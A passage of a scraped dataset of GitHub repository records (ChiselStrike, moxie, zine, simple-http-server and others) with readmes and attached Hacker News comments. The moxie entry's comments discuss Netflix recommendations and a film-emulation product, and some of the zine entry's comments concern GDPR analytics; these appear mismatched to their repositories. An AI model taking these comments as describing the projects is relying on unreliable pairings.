And how to offer all of that through an API?\n\nLearning all that, plus figuring out the interactions between all the\ncomponents can be a drain on an application developer's time. Low-code\nbased approaches allow for super fast prototypes, but as you need to scale and\nevolve, the time you saved on the prototype is now owed with interest in refactorings,\nmigrations, etc.\n\nChiselStrike provides everything you need to handle and evolve your backend,\nfrom the data layer to the business logic, allowing you to focus on what you\ncare about \u2013\u00a0your code, rather than worrying about databases schemas,\nmigrations, or even database operations.\n\nAll driven by TypeScript, so your backend can evolve as your code evolves.\n\n## How does that work?\n\nChiselStrike keeps things as close as possible to pure TypeScript, and a\n[translation\nlayer](https://blog.chiselstrike.com/my-other-database-is-a-compiler-10fd527a4d78)\ntakes care of index creation, database query generation, and even communicating\nwith external systems like Kafka.\n\nInternally, ChiselStrike uses a SQLite database so there's no need to set up\nany external data layer (although it is possible to hook up an external\nPostgres-compatible database). ChiselStrike also abstract other concepts\ncommon to complex backends, like\n[Kafka-compatible](https://blog.chiselstrike.com/dear-application-developer-how-far-can-you-really-go-without-a-message-queue-d9e5385fab64)\nstreaming platforms.\n\n![](imgs/diagram.png)\n\n## Quick start\n\nTo get a CRUD API working in 30 seconds or less, first create a new project:\n\n```console\nnpx -y create-chiselstrike-app@latest my-app\ncd my-app\n```\n\nAdd a model by writing the following TypeScript code to `models/BlogComment.ts`:\n\n```typescript\nimport { ChiselEntity } from \"@chiselstrike/api\"\n\nexport class BlogComment extends ChiselEntity {\n content: string = \"\";\n by: string = \"\";\n}\n```\n\nAdd a route by writing the following TypeScript code to `routes/comments.ts`:\n\n```typescript\nimport { BlogComment } from \"../models/BlogComment\";\nexport default BlogComment.crud();\n```\n\nStart the development server with:\n\n```console\nnpm run dev\n```\n\nThis server will provide a CRUD API that you can use to add and query instances\nof the BlogComment entity.\n\n```console\ncurl -X POST -d '{\"content\": \"First comment\", \"by\": \"Jill\"}' localhost:8080/dev/comments\n\ncurl localhost:8080/dev/comments\n```\n\nFor a more detailed tutorial about how to get started with ChiselStrike, follow\nour [Getting started tutorial](https://docs.chiselstrike.com/tutorials/getting-started/).\n\n### Is ChiselStrike a database?\n\nNo. The [founding team at ChiselStrike](https://chiselstrike.com/about-us) have written databases from scratch before and\nwe believe there are better things to do in life, like pretty much anything else. ChiselStrike comes bundled with SQLite,\nproviding developers with a zero-conf *relational-like abstraction* that allows one to think of backends\nfrom the business needs down, instead of from the database up.\n\nInstead, you can think of ChiselStrike as a big pool of global shared memory.\nThe data access API is an integral part of ChiselStrike and offers developers a way to just code, without\nworrying about the underlying database (anymore than you worry about what happens in each level of the memory hierarchy,\nmeaning some people do, but most people don't have to!).\n\nIn production, ChiselStrike can also hook up into a\n[Kafka-compatible](https://blog.chiselstrike.com/dear-application-developer-how-far-can-you-really-go-without-a-message-queue-d9e5385fab64)\nstreaming platform when available, and transparently drive both that and the database from a unified TypeScript/JavaScript abstraction.\n\n### Is ChiselStrike an ORM?\n\nKind of. ChiselStrike has some aspects that overlap with traditional ORMs, in that it allows you to access database abstractions\nin your programming language. However, in traditional ORMs you start from the database, and export it up. Changes\nare done to the database schema, which is then bubbled up through *migrations*, and elements of the database invariably leak\nto the API.\n\nChiselStrike, on the other hand, starts from your code and automates the decisions needed to implement that into the database, much\nlike what a [compiler](https://blog.chiselstrike.com/my-other-database-is-a-compiler-10fd527a4d78) would do.\n\nLet's look at [ChiselStrike's documentation](https://docs.chiselstrike.com/Intro/first) for an example of what's needed to create a comment on a blog post:\n\n```typescript\nimport { ChiselEntity } from \"@chiselstrike/api\"\n\nexport class BlogComment extends ChiselEntity {\n content: string = \"\";\n by: string = \"\";\n}\n```\n\nThe first thing you will notice is that there is no need to specify how those things map to the underlying database. No tracking\nof primary keys, column types, etc.\n\nNow imagine you need to start tracking whether this was created by a human or a bot. You can change your model\nto say:\n\n```typescript\nimport { ChiselEntity } from \"@chiselstrike/api\"\n\nexport class BlogComment extends ChiselEntity {\n content: string = \"\";\n by: string = \"\";\n isHuman: boolean = false;\n}\n```\n\nand that's it! There are no migrations and no need to alter a table.\n\nFurthermore, if you need to find all blog posts written by humans, you\ncan just write a lambda instead of trying to craft a database query in TypeScript:\n\n```typescript\nconst all = await BlogComment.findMany(p => p.isHuman);\n```\n\n### Is ChiselStrike a TypeScript runtime?\n\nChiselStrike includes a TypeScript runtime - the fantastic and beloved [Deno](https://github.com/denoland/deno). That's the last piece of the puzzle\nwith the data API and the database bundles. That allows you to develop everything locally from your laptop and integrate\nwith your favorite frontend framework. Be it Next.js, Gatsby, Remix, or any others - we're cool with all of them!\n\n### That's all fine and all, but I need more than that!\n\nWe hear you. No modern application is complete without authentication and security. ChiselStrike integrates with [next-auth](https://next-auth.js.org/)\nand allows you to specify authentication entities directly from your TypeScript models.\n\nYou can then add a policy file that details which fields can be accessed, and which endpoints are available.\n\nFor example, you can store the blog authors as part of the models,\n\n```typescript\nimport { ChiselEntity, AuthUser } from \"@chiselstrike/api\"\n\nexport class BlogComment extends ChiselEntity {\n content: string = \"\";\n @labels(\"protect\") author: AuthUser;\n}\n```\n\nand then write a policy saying that the users should only be able to see the posts that they themselves\noriginated:\n\n```yaml\nlabels:\n - name: protect\n transform: match_login\n```\n\nNow your security policies are declaratively applied separately from the code, and you can easily grasp what's\ngoing on.\n\n## In Summary\n\nChiselStrike provides everything you need to handle your backend, from the data layer to the business logic, wrapped in powerful abstractions that let you just code and not worry about handling databases schemas, migrations, and operations again.\n\nIt allows you to declaratively specify compliance policies around who can access the data and under which circumstances.\n\nYour ChiselStrike files can go into their own repo, or even better, into a subdirectory of your existing frontend repo. You can code your presentation and data layer together, and turn any frontend framework into a full-stack (including the database layer!) framework in minutes.\n\n## Contributing\n\nTo build and develop from source:\n\n```console\ngit submodule update --init --recursive\ncargo build\n```\n\nThat will build the `chiseld` server and `chisel` utility.\n\nYou can now use `create-chiselstrike-app` to install a local version of the API:\n```console\nnode ./packages/create-chiselstrike-app --chisel-version=\"file:../packages/chiselstrike-api\" my-backend\n```\n\nAnd then replace instances of `npm run` with direct calls to the new binaries. For example, instead of\n`npm run dev`, run\n\n```console\ncd my-backend\nnpm i esbuild\n../target/debug/chisel dev\n```\n\nAlso, consider:\n\n[Open (or fix!) an issue](https://github.com/chiselstrike/chiselstrike/issues) \ud83d\ude47\u200d\u2642\ufe0f\n\n[Join our discord community](https://discord.gg/GHNN9CNAZe) \ud83e\udd29\n\n[Start a discussion](https://github.com/chiselstrike/chiselstrike/discussions/) \ud83d\ude4b\u200d\u2640\ufe0f\n\n\n## Next steps?\n\nOur documentation (including a quick tutorial) is available at [docs.chiselstrike.com](https://docs.chiselstrike.com)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tyrchen/geektime-rust", "link": "https://github.com/tyrchen/geektime-rust", "tags": [], "stars": 820, "description": "\u6211\u7684\u6781\u5ba2\u65f6\u95f4 Rust \u8bfe\u7a0b\u7684\u4ee3\u7801\u4ed3\u5e93\uff0c\u968f\u8bfe\u7a0b\u66f4\u65b0", "lang": "Rust", "repo_lang": "", "readme": "#geektime-rust\n\nMy Geekbang Time [Rust Lesson 1](https://time.geekbang.org/column/intro/100085301) code repository, updated with the course\n\n![rust Lesson 1](images/rust_qr.jpg)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "anp/moxie", "link": "https://github.com/anp/moxie", "tags": ["rust", "ui", "declarative-ui", "incremental"], "stars": 820, "description": "lightweight platform-agnostic tools for declarative UI", "lang": "Rust", "repo_lang": "", "readme": "\"moxie\n\n# moxie\n\n![crates.io](https://img.shields.io/crates/v/moxie)\n![License](https://img.shields.io/crates/l/moxie.svg)\n[![codecov](https://codecov.io/gh/anp/moxie/branch/main/graph/badge.svg)](https://codecov.io/gh/anp/moxie)\n\n## More Information\n\nFor more information about the moxie project, see the [website](https://moxie.rs).\n\n## Contributing and Code of Conduct\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md) for overall contributing info and [CONDUCT.md](CODE_OF_CONDUCT.md)\nfor the project's Code of Conduct. The project is still early in its lifecycle but we welcome\nanyone interested in getting involved.\n\n## License\n\nLicensed under either of\n\n * [Apache License, Version 2.0](LICENSE-APACHE)\n * [MIT license](LICENSE-MIT)\n\nat your option.\n", "readme_type": "markdown", "hn_comments": "Frame rate probablyAnd... it's back online, supported by Ben's Bites, my favorite AI newsletter!\nhttps://bensbites.beehiiv.com/url forwarding is broken, you can use https://www.gptflix.aiRecommendation algorithms maximize the time you stay and interact with the platform.\nAs long as you stay on the platform and consume content its working.Its a bit the same as dating algorithms. If the algorithm was to good there would be no paying users of the service.IMO Netflix and Amazon Prime's problem is they don't surface their good content enough. They mix it with their shitty content. They should make it stand out. HBO are good at this. When they make something good, that they know is good, they will rub your face in it with large high quality images.I don't have time to shift out the good from the bad with Netflix.I have thought for years Netflix (for me, at least) would benefit massively from a \"never show me this show again\" button.I continually see the same bunch of shows when browsing that I will never, ever watch. They take up space and add to cognitive load and ultimately just annoy me each time I see them in the list.I'm sure this weighting would also be very useful from an algorithmic recommendations view as well.I actually went back to pirating movies/shows and host them on Plex.I sure have a much smaller collection than any streaming service, but it's actually all content I like, and I actually watch stuff instead of just browsing for 20min.For Amazon the issue for me has always been that aside from the things I shop for myself I get asked to buy things for other people or presents for family membersAmazon doesn't know who I bought something for so making sense of why I have bought 4 padlocks (my father in law), a set of sauce pans (wife), a light novel (myself) and rechargeable batteries (myself)For me personally, the recommendation engines choose the wrong aspects of shows that I like. They focus too much on genre, and not enough on writing qualities, variety, surprise, etc. Just because I liked one \u201cgritty suspenseful murder mystery\u201d (or whatever the genre is) does not mean I will like another! The execution could be wildly uneven in different programs that fall in the same subject matter bucket. I\u2019d rather see a recommendation that can figure out my tastes across genres.Maybe they push content that is cheaper to license optimizing for some sort of license-cost-per-viewer-hour metricits also possible they wont show you content you really want because its licensing is expensive, and instead they nudge you to content with higher % rev splitI got a tip from someone here and shifted to tracking what I want to watch with a seperate system trakt.tv.This lets it recommend across different services and removes incentives to promote their own content (I'm assuming someone at Amazon and Netflix is trying to goose their own stats by boosting the content they self create, or that they pay the least for)A link (and a free recommendation for an interesting show):https://trakt.tv/shows/giri-hajiIt lets you do nerdier searches like by director, writer, actor and similar to openlibrary.org it has some weird old stuff too.Is it thinkable that after \"hundreds of hours binging series and movies\" you have simply exhausted the options?Me, I haven't found a second The Wire yet, no matter how often a recommender claimed I have.If you are looking for movie recommendations, nothing beats movielense https://movielens.orgBecause priority number one is getting you to watch their originals, so that you will keep subscribing as the market for movies produced outside the streaming services gets more competitive.The big events gets featured on the home page, for anything you are probably better of searching for directors or reading reviews, and then finding where you can see it.Because it's profitable to recommend shit.For Netflix's DVD service, pre-streaming, their recommendation system was awesome. You know, the one where they had the contests and paid $1M to any group that could do better by some percentage?IMO, they don't use anything like that now for streaming. It's as others have said: this is what we want you to watch, not what you necessarily will like.I think Netflix needs an \"I really don't like this or programmes like it\" option....come to think of it so does YouTube.I'd love to be able to search for a particular genre and exclude everything that comes up.As someone that has worked within one of these orgs, it's because the recommendation system has been captured by contract negotiations and forced merchandising. You are not seeing things they think you would like. You are seeing the things they want you to watch.As others have mentioned, part of the goal is to induce you towards the service's self-made programming. They're rolling the dice that you will get hooked on something if they show you enough options, and your time spent searching for content (as long as it doesn't lead to an unsubscribe) is cheaper for them than time spent consuming content.FWIW, Spotify has similar issues in that they can't seem to figure out that new music from artists I'm \"following\" should be a slam dunk for the \"new music for you\" list.Their goal is to keep you subscribed, not to keep you entertained.They know they don\u2019t have enough premium content to keep you as a subscriber if that\u2019s all you watch. That kind of content usually costs a ton to create. So they need to have you watch filler content as well. And just like social media companies have taken advantage of the slot machine effect to increase addictiveness, so too do streamers. If everything you watch is good, you\u2019ll end up watching less and be more likely to cancel.You\u2019re assuming that the goal of a recommendation algorithm is to recommend the thing you\u2019d most want to watch at that specific moment. It\u2019s not. The goal is to maximize their retention. It\u2019s amazing how many of life\u2019s annoyances become instantly explainable when you realize that your interests are not aligned with those of the companies you\u2019re dealing with. Your happiness will always be a secondary concern to their profits.maybe you don't want to watch tvRead an article about how Netflix stages in house CDN \"boxes\" directly in key ISP locations, directly on the switch. Certain high ranking shows are spread through the CDN for responsiveness. Some of the recommended shows are the ones staged close to the watcher to eliminate lag. https://about.netflix.com/en/news/how-netflix-works-with-isp...Totally agree, that's why I gave up on it myself and created an aggregator.https://tomatotree.tvMy feeling is that Payola is most likely the reason why the recommendation algorithms are so bad rn.A big problem on Netflix is that they don't use the original poster or description for movies, instead coming up with their own. I find that these generally don't do movies justice.These services get paid to promote content. Did you think they are going to promote legit content?Maybe the problem is that they don't carry more of the content that you like?If you spent 20 mins looking, it's not their recommendation system that's failing. It's that you don't like their content (or how their content is portrayed).The recommendation system is the thing that shows you stuff without you needing to browse for 20 mins.Maybe recommendations are harder than we think because our tastes are too arbitrary and unpredictable. Maybe overlapping with someone else's tastes actually predicts nothing about whether there are any more places we will overlap, so it's not the simple data processing problem that we wish it to be.I've tried all sorts of \"people who liked X also enjoyed Y\" book and movie lists and it never seems any better than a generic list of decent books and movies.One of my favorite movies is The Arrival. To me, it's one of the best love stories ever told. Yet when I meet other people who really liked the movie, that wasn't the main draw for them. Perhaps it was the intrigue of the time travel or watching interesting characters navigate a complex conflict or perhaps they liked the provocative questions that it explores.Perhaps two people liking The Arrival says little about what they have in common at all, thus there's actually no data to go off beyond recommending both parties more critically acclaimed movies. I suspect that this might be the cold reality of recommendations.Honestly, I have yet to see a recommendation system that works very well.contrasting whit YouTube or tiktok is harder to Know why people like series ,less content, series become good after 40 minutes, people let their content run, do you want a background series or are u seeing in the momentfully ckncentrated, lees feedback look all the way downEdit: are you seeing alone or whit otherYou are asking for recommendations and they probably don\u2019t have anything. They\u2019re not going to say that. So you get things you don\u2019t want and things you have already seen.All streaming platforms i tried have this problem. Maybe the ranking of shows is commercially funded? Also annoying: netflix shows multiple cover images. Most annoying automatic playback of preview (including sound) in the menu.When I was growing up every kid watched more or less the same cartoons and played the same games. Life was simpler.Now as an adult there's too much out there and too little time.I suspect that this is a big part of why people feel there's nothing good to watch.Something else conspicuously missing from these services is a checkbox to make it never show me something again. Why do I have to scroll through an endless line of \"nope\", \"nope\", \"nope\", \"definitely not\", \"no\" every night, then look at all the same stuff tomorrow? Does someone get paid when I have to sacrifice a brain cell for each of these minor decisions?I do believe they have some kind of \"monetization\" going on regarding what they recommend you. Even YouTube apparently.They suggest the same thing over and over under \"different\" categories. I they go try to force \"popular\" content on you.One of the reasons I made this joke/rant projecthttps://victorribeiro.com/recommendation/Yeah. I especially find it interesting when Netflix says something you couldn't pay me to watch is a 92% match with my profile (or however they phrase it).But part of the problem the algorithm has is that content is of very uneven quality. I look at very recent things that, a few years ago, I would have wanted to see, and scroll on by. The first Avengers movie? Kind of rushed but acceptable. Thor Love and Thunder? Garbage. (Not Netflix examples, just examples)We want to see new content but have learned from recent experience that it's not worth the trouble. The algorithm simply can't understand that.Human beings cannot make good recommendations most of the time. What makes you think an algorithm can?My major problem with almost all recommendation engines and add-ons is that most of the time I want a recommendation that is orthogonal to the last thing I watched.If I just watched a Japanese yakuza crime thriller I don't want you to recommend another Japanese yakuza crime thriller. Give me something as good as what I just watched but different. But that's me. Many people just want to watch Hallmark Christmas romances until their heads explode.That's probably why I still use Criticker. Because it gives you one choice across multiple genres.https://www.criticker.com/Mass media platforms are very shallow when it come to \"managing personal information\". Netflix is a disaster in that regard. and yes this kind of UI works for the majority: To be honest, the average person, normally content with switching on a TV, couldn\u2019t care less.Stop relying on recommendations and figure out some humans that curateMy advice: Buy basic notebook, buy basic pen, and just start. It's easier to do that on paper - it removes all the digital distractions. Start with an intention to write something every day, no matter how long, with the ultimate goal to write at least one page daily. Use ChatGPT for ideas to write about if you can't find anything yourself (\"Give me 3 concrete ideas to write about in my journal\").> Linux support available for Studio license holders.Apparently using a free OS implies one is doing a \u201chigh-budget production\u201d and thus demands 5x cost. Of course the \u201clite\u201d version does not support Linux at all.As a photographer, emulation like this is of great interest to me. Like in cinematography, film is often held in high regard in photography with the caveat that it isn't even remotely as flexible as digital options.Have you considered creating a parallel product as an Adobe Lightroom plugin and/or a standalone app for still images?I'm getting \"Main.Sudo.Error error 1.\" when I try to install Filmbox Lite on Windows.\nI didn't try using it on my Mac yet.Related:Filmbox \u2013 Physically accurate motion picture film emulation - https://news.ycombinator.com/item?id=25367371 - Dec 2020 (49 comments)Have you all been hugged to death by any chance? No luck with email for the lite version. Seriously impressive results, can't wait to give it a go![dead]> It's been used in huge movies like \"Everything Everywhere All At Once\".An odd question, but I always wondered how do movie-related product developers learn about where their tool is used.Can you tell how it happened in your case?(The product looks fantastic.)This is cool, technologically speaking, but not sure I'd ever want movies to use it. I particularly don't want film grain, motion blur, low 24 FPS framerate, depth of field, chromatic aberration, etc in the movies and shows I watch.The skeuomorphic user interface below \"A tool for purists and mad scientists alike\" is really nice, but I doubt that is really how the app looks like.Can you discuss the technical details of how this was implemented? From a high level perspective, I can imagine it involves creating a 3d LUT from a color chart.Neat product. I know I'm asking in the worst possible place, but it'd be really cool if someone made some ShaderToy demos that do the same thing as a post-processing step.What's the difference between this and Dehancer?Cool software though not something I would pay for.If you're interested in getting most of this effect for free I highly recommend using the venerable Hald CLUT library found here: https://github.com/cedeber/hald-clutThese are lookup tables made using film scans and do a damn good job of emulating the film \"feel\" especially when used with HDR input without burnt highlights or crushed blacks.I personally recommend RawTherapee for photo editing, which includes native support for these.To further emulate the effect you can use a film grain overlay (hundreds available one google away) and a color-weighted bloom filter.ffmpeg and OBS also natively support this LUT format, I'm sure there are ways to use them in the FOSS video editing suites as well, but I basically do everything in ffmpeg commandline nowadays so I don't have firsthand experience.How does this compare to my Filmulator, which basically runs a simulation of stand development?https://filmulator.org(I've been too busy on another project to dedicate too much time to it the past year, and dealing with Windows CI sucks the fun out of everything, so it hasn't been updated in a while\u2026)Sujauddin RoyOn the front page of the site, something that could add to the compelling side-by-side comparison between Filmbox and real film is to show a 3rd image/synced clip, the digital image starting point, without any manipulation. (and hence the value add of Filmbox -- because as it is now of course it looks like the footage is identical, which is your point. But showing 2 basically identical clips doesn't add much).Maybe show the buildup of layers? That would be really interesting.Please please please please make something for CaptureOneDoes anyone the source of the movie sequences from the Filmbox presentation page? Thanks!Film simulations are cool. While I always take RAW images, I often use the builtin film simulation bracketing of my Fuji X-Systems to generate three JPEGs at the same time. This often gives me nice JPEGs which I can immediately pass on to family and friends, who view them on the smartphones or tablets and are happy without me doing time consuming RAW processing.Interestingly you can generate those simulations later in camera too while reviewing your images. And Darktable has some Fuji film simulation recipes builtin too for a start.Last but not least some sites, for example https://fujixweekly.com/, publish and review various film simulation recipes.http://www.cinegrain.com/These guys actually filmed every film stock and offer a similar thing. Think their stuff is used in all the big movies.Thank you for making it work with Davinci resolve[dead]\"Whatever you now find weird, ugly, uncomfortable and nasty about a new medium will surely become its signature. CD distortion, the jitteriness of digital video, the crap sound of 8-bit - all of these will be cherished and emulated as soon as they can be avoided. It\u2019s the sound of failure: so much modern art is the sound of things going out of control, of a medium pushing to its limits and breaking apart. The distorted guitar sound is the sound of something too loud for the medium supposed to carry it. The blues singer with the cracked voice is the sound of an emotional cry too powerful for the throat that releases it. The excitement of grainy film, of bleached-out black and white, is the excitement of witnessing events too momentous for the medium assigned to record them.\"- Brian EnoThose results look excellent.\nI'm trying to gauge whether something like this could potentially work in realtime, i.e. in games.\nI know it inevitably depends on hardware, resolution, settings, etc but do you have a ballpark figure for how long it takes to apply this to a frame?\n(And does it have a temporal aspect which requires access to frame N+k to render frame N?)Wonder how you differentiate yourselves from others in the space like Dehancer (which I find excellent, and is half the price), or older players like FilmConvert?Out of curiosity, is it normal for the Mac-only (until now) software in the film industry to get any traction like this one has?Something like this, but for VHS (aka something better than a simple filter), would be amazingAlways loved your software, glad to see you here. Polished and on point for 99% of my DIT use cases.Lattice being particularly close to heart. Thanks!Not sure how many people shoot film here, but I could have one look at the lite version processing and say this is just an emulation, especially in the shadows. The grain is predictable unlike \"real\" film.Funny that people will spend so much time, money and effort in making digital photos look like film, but refuse to shoot film. Just sad. :(As an artist and shader geek, I just want to say that this looks awesome. I'd love to see that blog post on Swift + Electron.Very light on detail. Is it different than just processing raw footage with already available fully free, high quality film emulation CLUTs and adding some grain? (Also I can't believe anyone would use everything everywhere all at once as a selling point, easily one of the worst movies I had to endure lately)I'm an old guy...in my 60s. I grew up with film and love the look of old movies. But this is 2023. Why are we still hanging on to a \"look\" that peaked in the 50s and 60s? Technology moves on.I mean, I get it. People are stubborn in their ways. They don't like change. It's SUBJECTIVE that someone may not like the look of something. But it drives me batty when people want their subjective opinion somehow presented as \"fact\". \"Based on empirical data\". Okay...so?A part of me think this is great, I love how film look.. Another part of me hates the idea, that something merely _looks_ like a thing, rather than _being_ the thing.. Can't explain why.. Especially since I can't watch film anywhere anyway, not even in cinema anymore..Are there any demos showing a side-by-side comparison of raw footage versus post-processing by Filmbox? I'd be interested to see the difference.As pro photographer and video producer, I use grain quite a lot. Subtle, almost non visible. It reduce artificial digital clean look that modern cameras gave us and also deband critical gradients.BUT... It is not usable for YouTube. Compression basically delete grain just like that. It is visible on vimeo. So it's good to think about it before buying and using any kind of extra grain.This is awesome![dead]As a photographer I am very much interested. I have enrolled in the license, then got a link to download a separate software, which then requires my password to install something into launchd. And it's not yet the Filmbox itself.So, at this point I had to abandon the installation which sucks because I really wanted to try it.Is there a pricing for students or people who just want to make their videos look cool for their families and friends? Unfortunately I really like the effect but can\u2019t afford this is a hobbyist.https://i.imgur.com/fTySVgd.pngIs it just me or are the expressions shown in these comparisons not identical? The top one looks like a smirk to me. The bottom looks more somber?Maybe the comparison videos are not synchronized perfectly? Or is it something more technically concerning?> It's been a huge rewrite to get this working on Linux and Windows from our original Mac and Metal code.Would be interested to read more about the technical details in a blog post.Did you end up porting your Metal code to something else which is then translated into Vulkan, Metal, DX12? Or do you now maintain your original Metal code alongside ports to Vulkan and DX12? Or something else?If you were to start another project today, would you go the same route of Metal first and then whatever else you did? Or would you go directly to the way that you are currently doing it?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wormtql/genshin_artifact", "link": "https://github.com/wormtql/genshin_artifact", "tags": ["genshin-impact", "rust", "vue", "wasm", "webassembly"], "stars": 819, "description": "\u83ab\u5a1c\u5360\u535c\u94fa | \u539f\u795e | \u5723\u9057\u7269\u642d\u914d | \u5723\u9057\u7269\u6f5c\u529b\u3002\u591a\u65b9\u5411\u5723\u9057\u7269\u81ea\u52a8\u642d\u914d\uff0c\u591a\u65b9\u5411\u5723\u9057\u7269\u6f5c\u529b\u4e0e\u8bc4\u5206, Genshin Impact artifacts assessment, artifacts auto combination, artifacts statistics, artifacts potential, and more.", "lang": "Rust", "repo_lang": "", "readme": "# Mona's Fortune Teller\nThis is my personal translation, so it's likely not correct\nGenshin Auto Relic Combination\uff0c[Address](https://www.genshin.art)\nAnother language:\n[english](./README_en.md)\n[Chinese](./README.md)\n## introduction\nGenshin Auto Relic Combination\n## feature\n+ Endorses all characters and weapons\n+ Different characters use different goals\n+...\n## Usage strategy\n- How much attack power can my relics have?\n- How to get the best defense and attack power?\n-...\n## run locally\n```\nnpm run serve\n```", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zineland/zine", "link": "https://github.com/zineland/zine", "tags": ["magazine", "zine", "ssg", "static-site-generator", "rust", "rust-lang"], "stars": 818, "description": "Zine - a simple and opinionated tool to build your own magazine.", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\n\n# zine\n\n[![Crates.io](https://img.shields.io/crates/v/zine.svg)](https://crates.io/crates/zine)\n![Crates.io](https://img.shields.io/crates/d/zine)\n[![license-apache](https://img.shields.io/badge/license-Apache-yellow.svg)](./LICENSE)\n\nZine - a simple and opinionated tool to build your own magazine.\n\nhttps://zineland.github.io\n\n- Mobile-first.\n- Intuitive and elegant magazine design.\n- Best reading experiences.\n- Theme customizable, extend friendly.\n- RSS Feed supported.\n- Open Graph Protocol supported.\n- Article topic supported.\n- I18n and l10n supported.\n- Build into a static website, hosting anywhere.\n\n## Installation\n\n`cargo install zine`\n\nor `brew install zineland/tap/zine`\n\nor `brew tap zineland/tap`, then `brew install zine`\n\n## Get Started\n\nRun `zine new your-zine-site`, you'll get following directory:\n\n```\n$ tree your-zine-site\nyour-zine-site\n\u251c\u2500\u2500 content # The content directory your issues located\n\u2502 \u2514\u2500\u2500 issue-1 # The first issue directory\n\u2502 \u251c\u2500\u2500 1-first.md # The first markdown article in this issue\n\u2502 \u2514\u2500\u2500 zine.toml # The issue Zine config file\n\u2514\u2500\u2500 zine.toml # The root Zine config file of this project\n\n2 directories, 3 files\n```\n\nRun `zine serve` to preview your zine site on your local computer:\n\n```\n$ cd your-zine-site\n\n$ zine serve\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n\u255a\u2550\u2550\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\n \u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557\n \u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\nlistening on http://127.0.0.1:3000\n```\n\nRun `zine build` to build your zine site into a static website:\n\n```\n$ cd your-zine-site\n\n$ zine build\nBuild success! The build directory is `build`.\n```\n\n## Some cool magazines powered by Zine\n\n- [https://zineland.github.io](https://zineland.github.io) The zine documentation is built by zine itself.\n- [https://rustmagazine.org](https://rustmagazine.org) The Rust Magazine.\n- [https://2d2d.io](https://2d2d.io)\n- [https://o11y.cn](https://o11y.cn)\n- [https://thewhitepaper.github.io](https://thewhitepaper.github.io)\n\n## Docmentations\n\n- [Getting started](https://zineland.github.io/getting-started)\n- [Customization](https://zineland.github.io/customization)\n- [Code blocks](https://zineland.github.io/code-blocks)\n- [Advanced](https://zineland.github.io/advanced)\n\n## TODO\n\n- [x] Support RSS Feed\n- [x] Support render OGP meta\n- [x] Support l10n\n- [x] Support sitemap.xml\n- [x] Support code syntax highlight\n- [x] Support table of content\n- [x] Support i18n\n- [x] `zine serve` support live reload\n- [x] Support article topic\n\n## License\n\nThis project is licensed under the [Apache-2.0 license](./LICENSE).\n", "readme_type": "markdown", "hn_comments": "In fact, the way that most of the privacy-friendly analytics tools advertise their services isn't compliant with GDPR either, as there's a broad consensus that third-party based analytics (even without cookies) cannot be enabled solely based on legitimate interest [1].Nothing against your service or the myriad other privacy-friendly analytics services, which arguably are more privacy-friendly than Google Analytics, I wouldn't take legal advice from them though as clearly they're often interpreting legislation generously in their favor as well. Unfortunately we're long past the point where people can rely on any vendor being factually correct, it's just about who can shout their truth the loudest (which is bad for publishers as they might be the ones getting fined for relying on these claims).1: https://www.degruyter.com/document/doi/10.1515/icom-2020-000...so what about an Italian person visiting a Portuguese website that uses GA. What is the legality there?Xerox \u2013 a simple and opinionated tool to build your own zineZ-eye-n or z-ee-n?I know its from magazine but I always default to z-eye-n pronunciation.I have a pet peeve when someone names a technology like this. A zine is an existing concept for cheap printed magazine like material. When you name your tech the exact same thing then there's no differentiation when I search something like \"Zine how to\".Are there any example magazines that are in English?We live in a world where everyone and their dog (sometimes literally) fights for your attention. If you are trying to advertise something comparable to a blog or magazine creation software, add a screenshot on what to expect at least.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TheWaWaR/simple-http-server", "link": "https://github.com/TheWaWaR/simple-http-server", "tags": ["static", "file", "server", "simplehttpserver", "http", "rust"], "stars": 818, "description": "Simple http server in Rust (Windows/Mac/Linux)", "lang": "Rust", "repo_lang": "", "readme": "# How it looks like?\n\n### Screenshot\n\n\n### Command Line Arguments\n```\nSimple HTTP(s) Server 0.6.3\n\nUSAGE:\n simple-http-server [FLAGS] [OPTIONS] [--] [root]\n\nFLAGS:\n --coep Add \"Cross-Origin-Embedder-Policy\" HTTP header and set it to \"require-corp\"\n --coop Add \"Cross-Origin-Opener-Policy\" HTTP header and set it to \"same-origin\"\n --cors Enable CORS via the \"Access-Control-Allow-Origin\" header\n -h, --help Prints help information\n -i, --index Enable automatic render index page [index.html, index.htm]\n --nocache Disable http cache\n --norange Disable header::Range support (partial request)\n --nosort Disable directory entries sort (by: name, modified, size)\n -s, --silent Disable all outputs\n -u, --upload Enable upload files (multiple select) (CSRF token required)\n -V, --version Prints version information\n\nOPTIONS:\n -a, --auth HTTP Basic Auth (username:password)\n --cert TLS/SSL certificate (pkcs#12 format)\n --certpass TLS/SSL certificate password\n -c, --compress ...\n Enable file compression: gzip/deflate\n Example: -c=js,d.ts\n Note: disabled on partial request!\n --ip IP address to bind [default: 0.0.0.0]\n -p, --port Port number [default: 8000]\n --redirect takes 